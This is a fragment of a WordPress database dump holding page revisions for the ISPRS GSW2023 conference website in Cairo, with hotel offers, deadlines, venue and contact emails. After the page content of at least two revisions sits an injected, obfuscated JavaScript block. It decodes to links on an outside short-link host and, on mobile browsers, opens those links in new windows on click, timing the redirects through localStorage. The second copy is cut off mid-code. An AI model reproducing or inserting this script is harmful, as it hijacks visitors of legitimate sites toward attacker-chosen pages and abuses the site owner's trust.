color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-07-29 03:23:00','2023-07-29 03:23:00','',3066,'https://gsw2023.com/?p=5065',0,'revision','',0),
(5066,1,'2023-08-01 05:32:48','2023-08-01 05:32:48','','preliminary','','inherit','open','closed','','preliminary','','','2023-08-01 05:32:48','2023-08-01 05:32:48','',2669,'https://gsw2023.com/wp-content/uploads/2023/08/preliminary.png',0,'attachment','image/png',0),
(5067,1,'2023-08-01 05:34:30','2023-08-01 05:34:30','<p>[vc_row][vc_column][vc_column_text]</p>\n<h3><strong>ISPRS GSW’2023 - Preliminary Program</strong></h3>\n<p>[/vc_column_text][vc_single_image image=\"5066\" img_size=\"1900x1000\"][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else 